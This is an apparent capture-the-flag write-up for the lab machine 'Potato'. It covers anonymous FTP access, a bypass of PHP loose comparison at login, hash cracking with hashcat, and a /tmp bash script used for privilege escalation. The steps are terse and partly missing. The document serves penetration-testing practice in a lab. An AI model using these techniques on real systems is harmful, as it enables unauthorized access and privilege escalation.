Proving Ground Play — Potato

INTRODUCTION

ENUMERATION

FTP on Port 2112

  1. ftp <IP ADDRESS> -p 2112
  2. Specify “anonymous” as the Username
  3. Specify <ANYTHING… No I mean anything> as the password
  4. To list the files use “ls -la”
  5. To get the files “get index.php.bak” and “get welcome.msg”
  1. Its clearly a type of PHP authentication page
  2. There is a password specified as “potato” ($pass= “potato”) but the comment also clearly states it should be changed, lets hope they ignored it.
  3. The PHP page makes use of “LOOSE” PHP Comparisons i.e. == and not === (Strict)

HTTP on Port 80

  • c === Colour output
  • ic === Ignore wordlist comments
  • w === Wordlist to use
  • u === URL to enumerate
  • mc === Which HTTP Codes to Report
  • fc === Which HTTP Codes to Filter i.e. 404
  • e === File extensions to enumerate
  • recursion === Recursively enumerate directories i.e. add a new FFuF job for discovered directories

EXPLOITATION

  1. LOOSE ==
  2. STRICT ===
  1. Has “admin” been specified as the username then == 0
  2. Does the Password specified match the variable “$pass” then == 0
  1. Start by capturing the actual login in Burpsuite and send it to repeater
  1. echo ‘<INSERT HASH HERE>’ > hash.txt
  2. hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt

PRIVILEGE ESCALATION

  1. echo ‘#!/bin/bash’ > /tmp/privEsc.sh
  2. echo ‘/bin/bash’ >> /tmp/privEsc.sh
  3. chmod +x /tmp/privEsc.sh

CLOSING

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store